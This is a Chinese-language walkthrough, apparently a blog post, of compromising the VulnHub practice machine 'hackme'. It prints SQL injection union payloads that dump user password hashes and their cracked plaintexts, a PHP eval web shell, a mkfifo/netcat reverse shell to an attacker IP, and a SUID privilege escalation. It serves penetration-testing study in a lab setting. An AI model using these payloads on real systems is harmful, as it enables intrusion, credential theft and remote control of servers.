vulnhub靶机hackme

主机发现和80探测

image-20250105232524047

端口扫描

image-20250105232540760

目录扫描,访问这个图片看看

image-20250105233731491

没东西了,就登录试试万能密码

image-20250105232751998

注册一个用户去

image-20250105232739125

登录后,那个重置密码的url没有用了,旁边那个链接就是退出登录

image-20250105232849013

直接进入的时候是没有任何结果的,要先点一下search按钮

image-20250106001613056

搜索关键字,oscp

image-20250106001745256

能直接查出结果了,存在sql注入漏洞,需要注意的是万能密码地方的空格(qwq前面的空格很重要)

oscp' or 1=1 -- qwq

image-20250106003247082

判断列数

oscp' or 1=1 order by 3 -- qwq

image-20250106004104430

联合查询

oscp' union select 1,2,3 -- qwq

image-20250106004304976

当前数据库

oscp' union select database(),2,3 -- qwq        

# webapphacking

暴数据库

oscp' union select group_concat(schema_name),2,3 from information_schema.schemata -- qwq     

# information_schema,mysql,performance_schema,sys,webapphacking

暴当前数据库的表

oscp' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database() -- qwq 

# books,users

users表的列(字段)

oscp' union select group_concat(column_name),2,3 from information_schema.columns where table_schema=database() and table_name="users" -- qwq 

# id,user,pasword,name,address

暴表数据

oscp' union select group_concat(user,'-',pasword),2,3 from users -- qwq 

# user1-5d41402abc4b2a76b9719d911017c592      hello
# user2-6269c4f71a55b24bad0f0267d9be5508      commando
# user3-0f359740bd1cda994f8b55330c86d845      p@ssw0rd
# test-05a671c66aefea124cc08b76ea6d30bb       testtest
# superadmin-2386acb2cf356944177746fc92523983 Uncrackable
# test1-05a671c66aefea124cc08b76ea6d30bb      testtest

# 下面两个是新加的
# xiaoyu-348f10f863b27ec106195c96e23dcd91     xiaoyu
# admin-e10adc3949ba59abbe56e057f20f883e      123456

image-20250106005429049

有了密码,ssh试试全都失败

image-20250106010113129

登录账号 superadmin 有一个文件上传

image-20250106010416670

上传一个一句话木马shell.php

image-20250106010605760

image-20250106010542608

<?php @eval($_POST['cmd']);?>

image-20250106010629934

蚂蚁连接

image-20250106010843622

这里的nc没有-e参数,所以用如下命令进行反弹 shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.111.128 6666 >/tmp/f

image-20250106011345692

反弹成功

image-20250106011317336

创建交互式终端

python3 -c 'import pty; pty.spawn("/bin/bash");'

image-20250106011706728

系统信息收集

image-20250106011817613

切换到home文件夹下面,意外发现一个suid文件

image-20250106012212531

执行文件,即可提权成功

image-20250106012439989

往期推荐

【oscp】Blender软件的信息泄露—VulnOSv2

【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了

【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!

【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏

ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
喜欢就支持一下吧
点赞19 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容